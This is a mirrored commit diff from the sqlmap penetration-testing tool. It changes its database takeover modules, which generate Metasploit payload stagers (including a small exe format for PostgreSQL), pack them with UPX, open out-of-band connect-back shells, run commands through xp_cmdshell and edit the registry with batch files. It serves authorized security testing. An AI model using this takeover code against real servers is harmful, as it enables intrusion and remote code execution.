PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2026-01-01 04:19:02 +00:00
Code Issues Projects Releases Wiki Activity

sqlmap 0.8-rc2: minor enhancement based on msfencode 3.3.3-dev -t exe-small so that also PostgreSQL supports again the out-of-band via Metasploit payload stager optionally to shellcode execution in-memory via sys_bineval() UDF. Speed up OOB connect back. Cleanup target file system after --os-pwn too. Minor bug fix to correctly forge file system paths with os.path.join() all around. Minor code refactoring and user's manual update.

Browse Source
This commit is contained in:
Bernardo Damele
2009-12-17 22:04:01 +00:00
parent a605980d66
commit e4e081cdc6
12 changed files with 103 additions and 76 deletions
Download Patch File Download Diff File Expand all files Collapse all files

51
lib/takeover/metasploit.py
View File

@@ -73,16 +73,16 @@ class Metasploit:
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP()
self.__msfCli = os.path.normpath("%s/msfcli" % conf.msfPath)
self.__msfConsole = os.path.normpath("%s/msfconsole" % conf.msfPath)
self.__msfEncode = os.path.normpath("%s/msfencode" % conf.msfPath)
self.__msfPayload = os.path.normpath("%s/msfpayload" % conf.msfPath)
self.__msfCli = os.path.normpath(os.path.join(conf.msfPath, "msfcli"))
self.__msfConsole = os.path.normpath(os.path.join(conf.msfPath, "msfconsole"))
self.__msfEncode = os.path.normpath(os.path.join(conf.msfPath, "msfencode"))
self.__msfPayload = os.path.normpath(os.path.join(conf.msfPath, "msfpayload"))
self.__msfPayloadsList = {
"windows": {
1: ( "Meterpreter (default)", "windows/meterpreter" ),
3: ( "Shell", "windows/shell" ),
4: ( "VNC", "windows/vncinject" ),
2: ( "Shell", "windows/shell" ),
3: ( "VNC", "windows/vncinject" ),
},
"linux": {
1: ( "Shell", "linux/x86/shell" ),
@@ -254,7 +254,7 @@ class Metasploit:
break
elif askChurrasco == False:
elif askChurrasco is False:
logger.warn("beware that the VNC injection might not work")
break
@@ -361,7 +361,7 @@ class Metasploit:
def __forgeMsfConsoleResource(self):
self.resourceFile = "%s/%s" % (conf.outputPath, self.__randFile)
self.resourceFile = os.path.join(conf.outputPath, self.__randFile)
self.__prepareIngredients(encode=False, askChurrasco=False)
@@ -542,7 +542,7 @@ class Metasploit:
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
self.__shellcodeFilePath = "%s/sqlmapmsf%s" % (conf.outputPath, self.__randStr)
self.__shellcodeFilePath = os.path.join(conf.outputPath, "sqlmapmsf%s" % self.__randStr)
self.__initVars()
self.__prepareIngredients(encode=encode, askChurrasco=False)
@@ -592,10 +592,20 @@ class Metasploit:
self.__randStr = randomStr(lowercase=True)
if kb.os == "Windows":
self.exeFilePathLocal = "%s/sqlmapmsf%s.exe" % (conf.outputPath, self.__randStr)
self.__fileFormat = "exe"
self.exeFilePathLocal = os.path.join(conf.outputPath, "sqlmapmsf%s.exe" % self.__randStr)
# Metasploit developers added support for the old exe format
# to msfencode using '-t exe-small' (>= 3.3.3-dev),
# http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
if kb.dbms == "PostgreSQL":
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
else:
self.exeFilePathLocal = "%s/sqlmapmsf%s" % (conf.outputPath, self.__randStr)
self.exeFilePathLocal = os.path.join(conf.outputPath, "sqlmapmsf%s" % self.__randStr)
self.__fileFormat = "elf"
if initialize == True:
@@ -614,7 +624,7 @@ class Metasploit:
payloadStderr = process.communicate()[1]
if kb.os == "Windows":
payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
@@ -623,10 +633,18 @@ class Metasploit:
if payloadSize:
payloadSize = payloadSize.group(1)
exeSize = os.path.getsize(self.exeFilePathLocal)
packedSize = upx.pack(self.exeFilePathLocal)
# Only pack the payload stager if the back-end DBMS is not
# PostgreSQL because for this DBMS, sqlmap uses the
# Metasploit's old exe format
if self.__fileFormat != "exe-small":
packedSize = upx.pack(self.exeFilePathLocal)
else:
packedSize = None
debugMsg = "the encoded payload size is %s bytes, " % payloadSize
if packedSize and packedSize != exeSize:
if packedSize and packedSize < exeSize:
debugMsg += "as a compressed portable executable its size "
debugMsg += "is %d bytes, decompressed it " % packedSize
debugMsg += "was %s bytes large" % exeSize
@@ -666,6 +684,9 @@ class Metasploit:
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
logger.debug(debugMsg)
if goUdf is False:
self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
def smb(self):
self.__initVars()

8
lib/takeover/registry.py
View File

@@ -45,7 +45,7 @@ class Registry:
self.__randStr = randomStr(lowercase=True)
self.__batPathRemote = "%s/sqlmapreg%s%s.bat" % (conf.tmpPath, self.__operation, self.__randStr)
self.__batPathLocal = "%s/sqlmapreg%s%s.bat" % (conf.outputPath, self.__operation, self.__randStr)
self.__batPathLocal = os.path.join(conf.outputPath, "sqlmapreg%s%s.bat" % (self.__operation, self.__randStr))
if parse == True:
readParse = "FOR /F \"tokens=2* delims==\" %%A IN ('REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n"
@@ -108,7 +108,7 @@ class Registry:
data = self.evalCmd(self.__batPathRemote, first)
self.delRemoteTempFile(self.__batPathRemote, bat=True)
self.delRemoteFile(self.__batPathRemote, doubleslash=True)
return data
@@ -124,7 +124,7 @@ class Registry:
logger.debug(debugMsg)
self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
self.delRemoteTempFile(self.__batPathRemote, bat=True)
self.delRemoteFile(self.__batPathRemote, doubleslash=True)
def delRegKey(self, regKey, regValue):
@@ -138,4 +138,4 @@ class Registry:
logger.debug(debugMsg)
self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
self.delRemoteTempFile(self.__batPathRemote, bat=True)
self.delRemoteFile(self.__batPathRemote, doubleslash=True)

16
lib/takeover/upx.py
View File

@@ -52,7 +52,7 @@ class UPX:
self.__upxPath = "%s/upx/macosx/upx" % paths.SQLMAP_CONTRIB_PATH
elif "win" in PLATFORM:
self.__upxPath = "%s/upx/windows/upx.exe" % paths.SQLMAP_CONTRIB_PATH
self.__upxPath = "%s\upx\windows\upx.exe" % paths.SQLMAP_CONTRIB_PATH
elif "linux" in PLATFORM:
self.__upxPath = "%s/upx/linux/upx" % paths.SQLMAP_CONTRIB_PATH
@@ -80,17 +80,17 @@ class UPX:
pollProcess(process)
upxStdout, upxStderr = process.communicate()
warnMsg = "failed to compress the file"
msg = "failed to compress the file"
if "NotCompressibleException" in upxStdout:
warnMsg += " because you provided a Metasploit version above "
warnMsg += "3.3-dev revision 6681. This will not inficiate "
warnMsg += "the correct execution of sqlmap. It might "
warnMsg += "only slow down a bit the execution of sqlmap"
logger.info(warnMsg)
msg += " because you provided a Metasploit version above "
msg += "3.3-dev revision 6681. This will not inficiate "
msg += "the correct execution of sqlmap. It might "
msg += "only slow down a bit the execution"
logger.debug(msg)
elif upxStderr:
logger.warn(warnMsg)
logger.warn(msg)
else:
return os.path.getsize(srcFile)

2
lib/takeover/xp_cmdshell.py
View File

@@ -144,7 +144,7 @@ class xp_cmdshell:
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
self.delRemoteTempFile(tmpFile)
self.delRemoteFile(tmpFile)
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
inject.goStacked("DELETE FROM %s" % self.cmdTblName)